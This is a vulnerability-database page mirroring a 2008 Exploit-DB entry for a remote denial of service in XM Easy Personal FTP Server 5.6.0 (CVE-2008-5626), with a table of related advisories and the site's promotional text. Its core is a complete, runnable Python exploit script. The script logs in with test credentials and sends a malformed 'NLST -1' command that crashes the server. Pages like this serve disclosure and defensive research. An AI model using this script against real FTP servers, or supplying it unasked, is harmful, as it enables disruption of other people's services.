Lucene search
+L

XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service

🗓️ 13 Oct 2008 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

XM Easy Personal FTP Server 5.6.0 Remote Do

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5626
13 Oct 200800:00
circl
CVE
CVE-2008-5626
17 Dec 200817:00
cve
Cvelist
CVE-2008-5626
17 Dec 200817:00
cvelist
Exploit DB
XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service
27 Mar 200900:00
exploitdb
Metasploit
XM Easy Personal FTP Server 5.6.0 NLST DoS
9 Jan 200905:33
metasploit
Metasploit
XM Easy Personal FTP Server 5.7.0 NLST DoS
7 Apr 200918:26
metasploit
NVD
CVE-2008-5626
17 Dec 200817:30
nvd
OpenVAS
XM Easy Personal FTP Server Denial of Service Vulnerability
23 Dec 200800:00
openvas
OpenVAS
XM Easy Personal FTP Server 'NSLT' Command Remote DoS Vulnerability
21 Oct 200800:00
openvas
OpenVAS
XM Easy Personal FTP Server Denial of Service Vulnerability
23 Dec 200800:00
openvas
Rows per page
print "--------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://www.shinnai.net"
print "--------------------------------------------------------------"

import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER test\r\n')
   print "Client -> USER: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS test\r\n')
   print "Client -> PASS: test"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('NLST -1\r\n')
   print "Client -> NSLT: -1"
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)
except:
   print "- Unable to connect. exiting."

# milw0rm.com [2008-10-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.3586
21